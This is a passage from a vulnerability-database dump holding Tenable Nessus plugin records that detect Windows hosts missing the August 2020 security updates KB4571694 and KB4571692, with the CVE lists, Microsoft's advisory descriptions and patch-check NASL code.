\"CVE-2020-1565\",\n \"CVE-2020-1566\",\n \"CVE-2020-1567\",\n \"CVE-2020-1568\",\n \"CVE-2020-1570\",\n \"CVE-2020-1577\",\n \"CVE-2020-1579\",\n \"CVE-2020-1584\",\n \"CVE-2020-1587\"\n );\n script_xref(name:\"IAVA\", value:\"0001-A-0647\");\n script_xref(name:\"IAVA\", value:\"2020-A-0361-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0367-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0370-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0438-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"MSKB\", value:\"4571694\");\n script_xref(name:\"MSFT\", value:\"MS20-4571694\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"KB4571694: Windows 10 Version 1607 and Windows Server 2016 August 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4571694.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1379,\n CVE-2020-1477, CVE-2020-1478, CVE-2020-1492,\n CVE-2020-1525, CVE-2020-1554)\n\n - A remote code execution vulnerability exists when\n Windows Media Audio Codec improperly handles objects. An\n attacker who successfully exploited the vulnerability\n could take control of an affected system. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media Audio\n Codec handles objects. (CVE-2020-1339)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The security\n update addresses the vulnerability by correcting how the\n Connected User Experiences and Telemetry Service handles\n file operations. (CVE-2020-1511)\n\n - An elevation of privilege vulnerability exists in the\n way that the srmsvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1475)\n\n - An elevation of privilege vulnerability exists when the\n Windows CDP User Components improperly handle memory.\n (CVE-2020-1549, CVE-2020-1550)\n\n - An information disclosure vulnerability exists when\n DirectWrite improperly discloses the contents of its\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how DirectWrite handles objects in memory.\n (CVE-2020-1577)\n\n - An elevation of privilege vulnerability exists when the\n Windows Network Connection Broker improperly handles\n memory. (CVE-2020-1526)\n\n - An information disclosure vulnerability exists in RPC if\n the server has Routing and Remote Access enabled. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system (CVE-2020-1383)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folders Service improperly handles memory.\n (CVE-2020-1470, CVE-2020-1484, CVE-2020-1516)\n\n - An elevation of privilege vulnerability exists when the\n Windows Custom Protocol Engine improperly handles\n memory. (CVE-2020-1527)\n\n - An elevation of privilege vulnerability exists when the\n Storage Service improperly handles file operations. An\n attacker who successfully exploited this vulnerability\n could gain elevated privileges on the victim system.\n (CVE-2020-1490)\n\n - An elevation of privilege vulnerability exists when the\n Windows Speech Runtime improperly handles memory.\n (CVE-2020-1521, CVE-2020-1522)\n\n - An elevation of privilege vulnerability exists when the\n Windows CSC Service improperly handles memory.\n (CVE-2020-1489, CVE-2020-1513)\n\n - An elevation of privilege vulnerability exists when the\n Windows Accounts Control improperly handles memory.\n (CVE-2020-1531)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles hard links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-1467)\n\n - A denial of service vulnerability exists in Windows\n Remote Desktop Gateway (RD Gateway) when an attacker\n connects to the target system using RDP and sends\n specially crafted requests. An attacker who successfully\n exploited this vulnerability could cause the RD Gateway\n service on the target system to stop responding.\n (CVE-2020-1466)\n\n - An elevation of privilege vulnerability exists in the\n Local Security Authority Subsystem Service (LSASS) when\n an authenticated attacker sends a specially crafted\n authentication request. A remote attacker who\n successfully exploited this vulnerability could cause an\n elevation of privilege on the target system's LSASS\n service. The security update addresses the vulnerability\n by changing the way that LSASS handles specially crafted\n authentication requests. (CVE-2020-1509)\n\n - A remote code execution vulnerability exists when the\n Windows Font Driver Host improperly handles memory. An\n attacker who successfully exploited the vulnerability\n would gain execution on a victim system. The security\n update addresses the vulnerability by correcting how the\n Windows Font Driver Host handles memory. (CVE-2020-1520)\n\n - An elevation of privilege vulnerability exists when the\n Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1519, CVE-2020-1538)\n\n - An information disclosure vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The update\n addresses the vulnerability by correcting the way the\n Windows State Repository Service handles objects in\n memory. (CVE-2020-1512)\n\n - An elevation of privilege vulnerability exists when the\n Windows Telephony Server improperly handles memory.\n (CVE-2020-1515)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1487)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1486, CVE-2020-1566)\n\n - An elevation of privilege vulnerability exists when the\n Windows File Server Resource Management Service\n improperly handles memory. (CVE-2020-1517,\n CVE-2020-1518)\n\n - An elevation of privilege vulnerability exists in the\n way that the dnsrslvr.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1584)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1553)\n\n - An elevation of privilege vulnerability exists when\n ASP.NET or .NET web applications running on IIS\n improperly allow access to cached files. An attacker who\n successfully exploited this vulnerability could gain\n access to restricted files. (CVE-2020-1476)\n\n - An elevation of privilege vulnerability exists when the\n Windows Remote Access improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could gain elevated privileges.\n (CVE-2020-1537)\n\n - An elevation of privilege vulnerability exists when the\n "Public Account Pictures" folder improperly\n handles junctions. (CVE-2020-1565)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1534)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge PDF Reader improperly handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. If the current\n user is logged on with administrative user rights, an\n attacker could take control of an affected system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-1568)\n\n - An elevation of privilege vulnerability exists when an\n attacker establishes a vulnerable Netlogon secure\n channel connection to a domain controller, using the\n Netlogon Remote Protocol (MS-NRPC). An attacker who\n successfully exploited the vulnerability could run a\n specially crafted application on a device on the\n network. (CVE-2020-1472)\n\n - An elevation of privilege vulnerability exists when the\n Windows Kernel API improperly handles registry objects\n in memory. An attacker who successfully exploited the\n vulnerability could gain elevated privileges on a\n targeted system. A locally authenticated attacker could\n exploit this vulnerability by running a specially\n crafted application. The security update addresses the\n vulnerability by helping to ensure that the Windows\n Kernel API properly handles objects in memory.\n (CVE-2020-1377, CVE-2020-1378)\n\n - An elevation of privilege vulnerability exists when the\n Windows Print Spooler service improperly allows\n arbitrary writing to the file system. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-1337)\n\n - An information disclosure vulnerability exists when the\n Windows Image Acquisition (WIA) Service improperly\n discloses contents of its memory. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2020-1474, CVE-2020-1485)\n\n - An elevation of privilege vulnerability exists when the\n Windows Ancillary Function Driver for WinSock improperly\n handles memory. (CVE-2020-1587)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1473, CVE-2020-1557, CVE-2020-1558,\n CVE-2020-1564)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes input. An attacker\n who successfully exploited this vulnerability could take\n control of an affected system. (CVE-2020-1046)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1533, CVE-2020-1556)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-1529)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-1380, CVE-2020-1570)\n\n - An elevation of privilege vulnerability exists when the\n Windows AppX Deployment Extensions improperly performs\n privilege management, resulting in access to system\n files. (CVE-2020-1488)\n\n - An elevation of privilege vulnerability exists when the\n Windows Function Discovery SSDP Provider improperly\n handles memory. (CVE-2020-1579)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-1561, CVE-2020-1562)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-1552)\n\n - An elevation of privilege vulnerability exists when\n Windows Remote Access improperly handles memory.\n (CVE-2020-1530)\n\n - A remote code execution vulnerability exists in the way\n that the MSHTML engine improperly validates input. An\n attacker could execute arbitrary code in the context of\n the current user. (CVE-2020-1567)\n\n - A spoofing vulnerability exists when Windows incorrectly\n validates file signatures. An attacker who successfully\n exploited this vulnerability could bypass security\n features and load improperly signed files. In an attack\n scenario, an attacker could bypass security features\n intended to prevent improperly signed files from being\n loaded. The update addresses the vulnerability by\n correcting how Windows validates file signatures.\n (CVE-2020-1464)\");\n # https://support.microsoft.com/en-us/help/4571694/windows-10-update-kb4571694\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1446acfc\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4571694.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1564\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Spooler Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/08/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-08';\nkbs = make_list(\n '4571694'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'14393',\n rollup_date:'08_2020',\n bulletin:bulletin,\n rollup_kb_list:[4571694])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n\n\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:09:27", "description": "The remote Windows host is missing security update 4571692.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1379, CVE-2020-1477, CVE-2020-1478, CVE-2020-1492, CVE-2020-1525, CVE-2020-1554)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1533, CVE-2020-1556)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service handles file operations. (CVE-2020-1511)\n\n - A remote code execution vulnerability exists when Windows Media Audio Codec improperly handles objects. An attacker who successfully exploited the vulnerability could take control of an affected system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Audio Codec handles objects. (CVE-2020-1339)\n\n - An information disclosure vulnerability exists when DirectWrite improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how DirectWrite handles objects in memory.\n (CVE-2020-1577)\n\n - An information disclosure vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system (CVE-2020-1383)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folders Service improperly handles memory.\n (CVE-2020-1470, CVE-2020-1484, CVE-2020-1516)\n\n - An elevation of privilege vulnerability exists when the Windows Custom Protocol Engine improperly handles memory. (CVE-2020-1527)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1529)\n\n - An elevation of privilege vulnerability exists when the Storage Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges on the victim system.\n (CVE-2020-1490)\n\n - An elevation of privilege vulnerability exists when the Windows CSC Service improperly handles memory.\n (CVE-2020-1489, CVE-2020-1513)\n\n - An elevation of privilege vulnerability exists when the Windows Accounts Control improperly handles memory.\n (CVE-2020-1531)\n\n - An elevation of privilege vulnerability exists in the Local Security Authority Subsystem Service (LSASS) when an authenticated attacker sends a specially crafted authentication request. A remote attacker who successfully exploited this vulnerability could cause an elevation of privilege on the target system's LSASS service. The security update addresses the vulnerability by changing the way that LSASS handles specially crafted authentication requests. (CVE-2020-1509)\n\n - A remote code execution vulnerability exists when the Windows Font Driver Host improperly handles memory. An attacker who successfully exploited the vulnerability would gain execution on a victim system. The security update addresses the vulnerability by correcting how the Windows Font Driver Host handles memory. (CVE-2020-1520)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1510)\n\n - An information disclosure vulnerability exists when the Windows State Repository Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows State Repository Service handles objects in memory. (CVE-2020-1512)\n\n - An elevation of privilege vulnerability exists when the Windows Telephony Server improperly handles memory.\n (CVE-2020-1515)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1487)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1486, CVE-2020-1566)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1553)\n\n - An elevation of privilege vulnerability exists in the way that the dnsrslvr.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1584)\n\n - An elevation of privilege vulnerability exists when the Windows Network Connection Broker improperly handles memory. (CVE-2020-1526)\n\n - An elevation of privilege vulnerability exists when ASP.NET or .NET web applications running on IIS improperly allow access to cached files. An attacker who successfully exploited this vulnerability could gain access to restricted files. (CVE-2020-1476)\n\n - An elevation of privilege vulnerability exists when the Windows Remote Access improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges.\n (CVE-2020-1537)\n\n - An elevation of privilege vulnerability exists when the "Public Account Pictures" folder improperly handles junctions. (CVE-2020-1565)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. (CVE-2020-1534)\n\n - A remote code execution vulnerability exists when Microsoft Edge PDF Reader improperly handles objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1568)\n\n - An elevation of privilege vulnerability exists when the Windows Kernel API improperly handles registry objects in memory. An attacker who successfully exploited the vulnerability could gain elevated privileges on a targeted system. A locally authenticated attacker could exploit this vulnerability by running a specially crafted application. The security update addresses the vulnerability by helping to ensure that the Windows Kernel API properly handles objects in memory.\n (CVE-2020-1377, CVE-2020-1378)\n\n - An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1337)\n\n - An information disclosure vulnerability exists when the Windows Image Acquisition (WIA) Service improperly discloses contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system.\n (CVE-2020-1474, CVE-2020-1485)\n\n - An elevation of privilege vulnerability exists when the Windows Ancillary Function Driver for WinSock improperly handles memory. (CVE-2020-1587)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1473, CVE-2020-1557, CVE-2020-1558, CVE-2020-1564)\n\n - A remote code execution vulnerability exists when Microsoft .NET Framework processes input. An attacker who successfully exploited this vulnerability could take control of an affected system. (CVE-2020-1046)\n\n - An elevation of privilege vulnerability exists when the Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1519, CVE-2020-1538)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Engine improperly handles memory.\n (CVE-2020-1535, CVE-2020-1536, CVE-2020-1539, CVE-2020-1540, CVE-2020-1541, CVE-2020-1542, CVE-2020-1543, CVE-2020-1544, CVE-2020-1545, CVE-2020-1546, CVE-2020-1547, CVE-2020-1551)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-1380, CVE-2020-1570)\n\n - An elevation of privilege vulnerability exists when the Windows AppX Deployment Extensions improperly performs privilege management, resulting in access to system files. (CVE-2020-1488)\n\n - An elevation of privilege vulnerability exists when the Windows Function Discovery SSDP Provider improperly handles memory. (CVE-2020-1579)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-1561, CVE-2020-1562)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-1552)\n\n - An elevation of privilege vulnerability exists when Windows Remote Access improperly handles memory.\n (CVE-2020-1530)\n\n - A remote code execution vulnerability exists in the way that the MSHTML engine improperly validates input. An attacker could execute arbitrary code in the context of the current user. (CVE-2020-1567)\n\n - A spoofing vulnerability exists when Windows incorrectly validates file signatures. An attacker who successfully exploited this vulnerability could bypass security features and load improperly signed files. In an attack scenario, an attacker could bypass security features intended to prevent improperly signed files from being loaded. The update addresses the vulnerability by correcting how Windows validates file signatures.\n (CVE-2020-1464)", "cvss3": {}, "published": "2020-08-11T00:00:00", "type": "nessus", "title": "KB4571692: Windows 10 August 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1046", "CVE-2020-1337", "CVE-2020-1339", "CVE-2020-1377", "CVE-2020-1378", "CVE-2020-1379", "CVE-2020-1380", "CVE-2020-1383", "CVE-2020-1464", "CVE-2020-1470", "CVE-2020-1473", "CVE-2020-1474", "CVE-2020-1476", "CVE-2020-1477", "CVE-2020-1478", "CVE-2020-1484", "CVE-2020-1485", "CVE-2020-1486", "CVE-2020-1487", "CVE-2020-1488", "CVE-2020-1489", "CVE-2020-1490", "CVE-2020-1492", "CVE-2020-1509", "CVE-2020-1510", "CVE-2020-1511", "CVE-2020-1512", "CVE-2020-1513", "CVE-2020-1515", "CVE-2020-1516", "CVE-2020-1519", "CVE-2020-1520", "CVE-2020-1525", "CVE-2020-1526", "CVE-2020-1527", "CVE-2020-1529", "CVE-2020-1530", "CVE-2020-1531", "CVE-2020-1533", "CVE-2020-1534", "CVE-2020-1535", "CVE-2020-1536", "CVE-2020-1537", "CVE-2020-1538", "CVE-2020-1539", "CVE-2020-1540", "CVE-2020-1541", "CVE-2020-1542", "CVE-2020-1543", "CVE-2020-1544", "CVE-2020-1545", "CVE-2020-1546", "CVE-2020-1547", "CVE-2020-1551", "CVE-2020-1552", "CVE-2020-1553", "CVE-2020-1554", "CVE-2020-1556", "CVE-2020-1557", "CVE-2020-1558", "CVE-2020-1561", "CVE-2020-1562", "CVE-2020-1564", "CVE-2020-1565", "CVE-2020-1566", "CVE-2020-1567", "CVE-2020-1568", "CVE-2020-1570", "CVE-2020-1577", "CVE-2020-1579", "CVE-2020-1584", "CVE-2020-1587"], "modified": "2023-02-06T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_AUG_4571692.NASL", "href": "https://www.tenable.com/plugins/nessus/139487", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(139487);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/06\");\n\n script_cve_id(\n \"CVE-2020-1046\",\n \"CVE-2020-1337\",\n \"CVE-2020-1339\",\n \"CVE-2020-1377\",\n \"CVE-2020-1378\",\n \"CVE-2020-1379\",\n \"CVE-2020-1380\",\n \"CVE-2020-1383\",\n \"CVE-2020-1464\",\n \"CVE-2020-1470\",\n \"CVE-2020-1473\",\n \"CVE-2020-1474\",\n \"CVE-2020-1476\",\n \"CVE-2020-1477\",\n \"CVE-2020-1478\",\n \"CVE-2020-1484\",\n \"CVE-2020-1485\",\n \"CVE-2020-1486\",\n \"CVE-2020-1487\",\n \"CVE-2020-1488\",\n \"CVE-2020-1489\",\n \"CVE-2020-1490\",\n \"CVE-2020-1492\",\n \"CVE-2020-1509\",\n \"CVE-2020-1510\",\n \"CVE-2020-1511\",\n \"CVE-2020-1512\",\n \"CVE-2020-1513\",\n \"CVE-2020-1515\",\n \"CVE-2020-1516\",\n \"CVE-2020-1519\",\n \"CVE-2020-1520\",\n \"CVE-2020-1525\",\n \"CVE-2020-1526\",\n \"CVE-2020-1527\",\n \"CVE-2020-1529\",\n \"CVE-2020-1530\",\n \"CVE-2020-1531\",\n \"CVE-2020-1533\",\n \"CVE-2020-1534\",\n \"CVE-2020-1535\",\n \"CVE-2020-1536\",\n \"CVE-2020-1537\",\n \"CVE-2020-1538\",\n \"CVE-2020-1539\",\n \"CVE-2020-1540\",\n \"CVE-2020-1541\",\n \"CVE-2020-1542\",\n \"CVE-2020-1543\",\n \"CVE-2020-1544\",\n \"CVE-2020-1545\",\n \"CVE-2020-1546\",\n \"CVE-2020-1547\",\n \"CVE-2020-1551\",\n \"CVE-2020-1552\",\n \"CVE-2020-1553\",\n \"CVE-2020-1554\",\n \"CVE-2020-1556\",\n \"CVE-2020-1557\",\n \"CVE-2020-1558\",\n \"CVE-2020-1561\",\n \"CVE-2020-1562\",\n \"CVE-2020-1564\",\n \"CVE-2020-1565\",\n \"CVE-2020-1566\",\n \"CVE-2020-1567\",\n \"CVE-2020-1568\",\n \"CVE-2020-1570\",\n \"CVE-2020-1577\",\n \"CVE-2020-1579\",\n \"CVE-2020-1584\",\n \"CVE-2020-1587\"\n );\n script_xref(name:\"MSKB\", value:\"4571692\");\n script_xref(name:\"MSFT\", value:\"MS20-4571692\");\n script_xref(name:\"IAVA\", value:\"2020-A-0361-S\");\n script_xref(name:\"IAVA\", 